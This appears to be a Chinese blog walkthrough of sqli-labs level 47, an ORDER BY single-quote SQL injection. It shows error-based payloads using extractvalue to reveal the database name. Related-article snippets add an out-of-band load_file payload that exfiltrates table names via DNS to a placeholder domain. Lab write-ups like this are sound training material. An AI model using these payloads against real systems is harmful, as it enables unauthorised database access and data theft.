sqllab第四十七关通关笔记

最新推荐文章于 2025-12-21 15:55:57 发布
原创 最新推荐文章于 2025-12-21 15:55:57 发布 · 433 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#笔记 #sqllab

本文探讨了一次在Web应用程序中检测到的字符型注入漏洞,通过实验展示了如何利用`orderby`位置进行攻击,尝试单引号绕过失败后,成功实现了错误注入并获取了数据库名。

知识点:

  • 错误注入
  • 字符型注入
  • order by 位置注入
    • 报错注入
    • 时间盲注

通过测试发现是一个字符型注入

构造payload:sort=2'               报错了

构造payload:sort=2''              不提示报错了

说明这里存在字符型注入

尝试进行单引号绕过

构造payload:sort=2'and 1='1

这里其实and后面的没起到作用,整体也没作用感觉,内容顺序没变过

直接进行错误注入

构造payload:sort=2'and extractvalue(1,concat(0x7e,database(),0x7e))='1

成功获取到了数据库名

10

SQL-Labs靶场“46-50”通关教程
钟言的博客
02-24 1万+
本篇为SQL-Labs靶场的第46到50教程,详细内容包含了:四十六 ORDER BY数字型注入 1、源码分析 2、rand()盲注 3、if语句盲注 4、时间盲注 5、报错注入 6、Limit注入 四十七 ORDER BY单引号报错注入 1、源码分析 2、报错注入 3、时间盲注 三、四十八 ODRER BY数字型盲注 1、源码分析 2、rand()盲注 3、if语句盲注 4、时间盲注 四、四十九 ORDER BY单引号盲注1、源码分析 2、时间盲注 五、五十 ORDER BY数字型堆叠注等
sqli-labs通关笔记
m0_67795959的博客
10-23 1238
id=1' and (select load_file(concat("//",(select table_name from information_schema.tables where table_schema = database() limit 3,1),".域名/123.txt")))--+要写为rand(0) 或者rand(4):rand()函数的执行速度要比 group by查询并插入key值的速度更快,只有rand(0)这个顺序可以导致在插入第三个数据,rand执行第五次时导致键值冲突。
Sqli-labs less 47
weixin_34204057的博客
08-11 559
Less-47sql语句为$sql = "SELECT * FROM users ORDER BY '$id'"; 将id变为字符型,因此根据我们上述提到的知识,我们依旧按照注入的位置进行分类。 、order by后的参数 我们只能使用and来进行报错和延时注入。我们下面给出几个payload示例。 ① and rand相结合的方式,payload:http://...
sqli-labs/Less-47
m0_71299382的博客
11-22 279
sqli-labs第四十七
详细sqli-labs(1-65)通关讲解
m0_67401134的博客
07-30 1万+
如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65重点卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。...
sqli-labs————Less-47(procedure alalyse\lines terminated by利用)
Fly_鹏程万里
05-21 1178
Less-47源代码:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head&gt..
DVWA 共12通关笔记
09-12
【DVWA 共12通关笔记】 DVWA(Damn Vulnerable Web Application)是一个用于网络安全教育的开源Web应用程序。它包含各种安全漏洞,为初学者和专业人士提供了实践和学习Web安全漏洞的机会。DVWA分为多个级别,从低...
SQLi-Labs靶场通关笔记(1~21
trdtyvu的博客
07-06 3400
SQLi-Labs是一个专注于SQL注入的在线靶场,通过模拟真实的Web应用环境,帮助安全爱好者提高SQL注入的防范和应对能力。它一共有65个卡,其中卡的类型有但不限于联合查询注入,报错注入,布尔盲注,延时盲注,POST注入,Cookie注入,WAF绕过……可以看出,涵盖的范围还是很广的,对于我们初学注入的人来说很友好。首页可以选择卡。
sqli-labs闯笔记
qq_41738909的博客
01-13 641
3.报错了典型的单引号注入,顺着单引号注入开干!3没报错有三列,4报错了证明有最多有3列。7.看到了username,password这俩就是目标了!id=1在后面加上',"判断是个啥注入方式。5.得到了数据库名字'security' 开始爆库。4. 查看一下他有哪些库和数据库版本。6.拿到了库名,开始爆表。1.打开页面观察一下。
SQL注入:sqli-labs靶场通关(第十五——第二十
l258282的博客
12-14 1064
使用1 or 1=1 和 1 or 1=2发现页面正常。输入1’发现并没有报错,输入1"发现也没有报错。1'1"这次连闭合报错的信息都没有了,所以不能用报错注入了。这里可以用布尔盲注或时间盲注。
sql-lab 41-65通关秘籍
weixin_46329549的博客
04-19 258
Less-41 41和40相同,相步骤查看上篇博客。 Less-42 这一通过查看源代码发现是对用户名进行了过滤,所以应该在password处进行注入,单引号错误。 Less-43 和42相同不过是单引号加括号错误。 Less-44 同上,但是没有回显,单引号错误。 Less-45 同上,没有回显,单引号加括号型错误。 Less-46 从本题开始利用order by进行注入,对id进行降...
sql-lab 通关Less1 -65(深入学习)
热门推荐
ST0new的博客
10-02 2万+
文章目录sql-lab 复现通关(深入学习)前言目的less-1 基于错误的单引号字符串Less-2 基于错误的get整型注入Less-3 基于错误的get单引号变形字符型注入Less-4 基于错误的GET双引号字符型注入Less-5 双注入GET单引号字符型注入Less-6 双注入GET双引号字符型注入Less-7 导出文件GET字符型注入Less-8 布尔型单引号GET盲注Less-9 ...
sql-lab (46~53)(后持续更新) order by 注入
m0_62879498的博客
01-25 2909
(46~50) sql-lab-46 一进入46页面就提示我们使用 sort : 我们尝试这使用 ?sort=1 发现: 然后 ?sort=2: ?sort=3: 我们发现当我们使用 sort=1 时 表格以第一列进行排列,sort=2 时 表格以第二列进行排列, sort=3 时 表格以第三列进行排序。我们想到了order by 函数 ,猜测可能是与 order by 函数相的注入。 查看源码: $sql = "SELECT * FROM users ORDER BY $id";
sqli-labs Less-46、47、48、49(sqli-labs闯指南 46、47、48、49)—order by 相注入
m0_54899775的博客
12-28 1438
sqli-labs Less-46、47、48、49(sqli-labs闯指南 46、47、48、49)—order by 相注入
Javaweb 学习笔记——html+css
hssfscv的博客
12-18 913
以上是Javaweb中于前端html和css的相内容,主要制作了两个页面,了解了如何使用AI生成我们需要的内容,有利于了解前端知识,接下来将进行剩余前端知识的学习
TK_网络基础和常见攻击(笔记
最新发布
汤小萌的博客
12-21 577
它确保内网中每一个IP地址的使用者都是经过授权、身份明确的设备,防止“内鬼”作乱。再vlan下启用user-bind报表检查(也可以在接口下,但是范围更小一些)它不信任外部来的报文,通过路径反查,过滤掉大量源IP不。没有命中的arp报文会认为是非法的而丢弃。真实(伪造)的攻击流量,如反射放大攻击。发送第一个数据包时进行拦截。企图毒化他人缓存时进行阻断。:按攻击发生的时间顺序。网络的第一步就进行控制。:在攻击者接入网络后,是否在同一个隔离组。
【算法笔记】AC自动机
u012559967的专栏
12-19 724
AC自动机: AC自动机是一种高效的多模式字符串匹配算法,它巧妙地将 Trie树的字典结构与 KMP算法的失配指针思想相结合,能同时在一段文本中查找多个模式串的所有出现位置,广泛应用于敏感词过滤、生物信息学序列分析等领域。在字符串匹配领域,我们会遇到两类问题:单模式匹配:给定一个文本字符串和一个模式字符串,判断模式字符串是否出现在文本字符串中。《【算法笔记】KMP算法》多模式匹配:给定一个文本字符串和多个模式字符串,判断所有模式字符串是否出现在文本字符串中。解决方案:AC自动机算法。
【大模型】happy-llm笔记
weixin_45207619的博客
12-16 178
今天看了这套课程的第二章到第四章的内容,对自己一直以来好奇的一些llm相的问题有了解答。将我遇到的问题整理到下面,部分可能没有回答,感兴趣的同学可以去原课程查找。happy-llm是datawhale发布的一套于llm的教程,链接。
MySQL 学习笔记(进阶篇2)
2302_79807388的博客
12-20 702
(1) 视图(View)是一种虚拟存在的表。视图中的数据并不在数据库中实际存在,行和列数据来自定义视图的查询中使用的表,并且是在使用视图时动态生成的。(2) 通俗的讲,视图只保存了查询的SQL逻辑,不保存查询结果。所以我们在创建视图的时候,主要的工作就落在创建这条SQL查询语句上。① 没有:不会检查当前视图的WHERE条件,即使数据不满足该条件,也能成功存入基表;但后续查询该视图时,这条不满足条件的数据不会在视图结果中显示② 有 check option:会按LOCALCASCADED。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

I_WORM

大佬们,赏点儿碎银吧~~

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值